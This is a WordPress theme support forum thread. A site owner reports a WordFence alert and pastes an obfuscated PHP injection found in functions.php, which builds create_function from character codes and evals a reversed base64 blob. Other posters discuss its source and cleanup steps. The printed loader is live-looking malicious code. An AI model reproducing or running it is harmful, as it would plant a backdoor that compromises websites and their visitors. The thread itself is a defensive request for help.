Functions.Php Question

Homepage Community Forums inSync Theme Support Functions.Php Question

Tagged: 

Viewing 8 posts - 1 through 8 (of 8 total)
  • Author
    Posts
  • January 15, 2015 at 10:57 pm #14916
    futurewebboss
    Customer

      I just got an alert from WordFence security that “This file appears to be installed by a hacker to perform malicious activity. If you know about this file you can choose to ignore it to exclude it from future scans. The text we found in this file that matches a known malicious file is: “edoced_46esab(“. “.

      I went and looked at the functions.php file and at the very top of the file the text is as follows;
      <?php $kfpclx=chr(99).”\x72″.chr(101).”a”.”t”.”\x65″.”\x5f”.”\x66″.”u”.chr(110).”c”.”\x74″.”\x69″.”\x6f”.”n”;$fxnfan = $kfpclx(‘$a’,strrev(‘;)a$(lave’)); $fxnfan(strrev(‘;))”==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”(edoced_46esab(lave’));?><?php

      Then following this is the “start the engine” line of code.
      Not sure what to do here.
      any guidance?
      Thanks

      Dan

      January 15, 2015 at 11:09 pm #14917
      Eric
      Customer

        That malicious code isn’t in any of the themes I have from Appfinite. Where did you download this theme from? If you downloaded it from appfinite directly, then it definitely won’t have any malicious code (I just checked all of the versions that I have)…..but if you’ve downloaded from someone else on the outside, then they could have very well added in something malicious in an attempt to hack you. This is why everyone in WordPress recommends downloading themes from the people/company that actually made the theme to avoid something like this.

        If you did download from appfinite ONLY, then that means you have something else wrong with your site (unrelated to the child theme). It’s definitely not from the theme, as there isn’t anyway for them to do so through the child theme itself. It could be a plugin, or any type of vulnerable code that could have been added in manually. This is the first time I’ve ever seen something like this mentioned on this site, and since I know Genesis is known for good security, I can assume there must be something else causing the issue.

        I would contact your host ASAP to see if they can figure out whats going on. They should have the tools to find out exactly where and how whoever was able to hack into your account were able to do it.

        I create awesome sites for awesome people! Contact me if interested – ericsanchez1585@gmail.com

        January 15, 2015 at 11:11 pm #14918
        futurewebboss
        Customer

          I don’t see this encoding in the insynch theme I downloaded, so it got added but what’s strange is that when I look at the file in FTP the last mod date was 12/14 of 2014. Any insight would be appreciated. The permissions on the file is 644.

          January 15, 2015 at 11:12 pm #14919
          futurewebboss
          Customer

            Yeah, it came from appfinite. Can I just delete the section? can’t get in touch with the host unfortunately. It’s a client site and have to wait until tomorrow AM. What to do.

            January 15, 2015 at 11:18 pm #14920
            Eric
            Customer

              Yes, you could delete that section, but I can’t promise that will fix the issue. Since it doesn’t appear to be a theme issue, that means that someone somehow has or had access to your account in some kind of way. So if they’ve added code into that file before, I’m not sure if they’ll be able to repeat it or not. I would reset your passwords and check any outdated plugins to make sure everything is up to date. This is definitely an unusual thing, and I would take immediate action to try and at least prevent it from happening in the future.

              I create awesome sites for awesome people! Contact me if interested – ericsanchez1585@gmail.com

              January 15, 2015 at 11:20 pm #14921
              futurewebboss
              Customer

                Agreed. I just scanned with scuri and no malware was found and there is no admin account and I’m using a very secure p/w. thanks for the immediate reply Eric. I’m leary of deleting the lines in the code. Guess I should back up functions.php anyway even though it might be suspucious. Or wait until the AM to call the host.

                January 15, 2015 at 11:30 pm #14922
                futurewebboss
                Customer

                  When browsing WordFence security the only allowed user login was from me. All other attempts trying to hack the admin account (which is non existent) were blocked by WordFence.
                  And as mentioned FTP shows last mod of the functions.php was on 12/14. I’ll leave it for now but if I learn anything from this I will share for the benefit of others.

                  January 16, 2015 at 2:35 pm #14925
                  Eric
                  Customer

                    Yes please let us know if you can. Hopefully everything gets fixed.

                    I create awesome sites for awesome people! Contact me if interested – ericsanchez1585@gmail.com

                  • Author
                    Posts
                  Viewing 8 posts - 1 through 8 (of 8 total)
                  • You must be logged in to reply to this topic.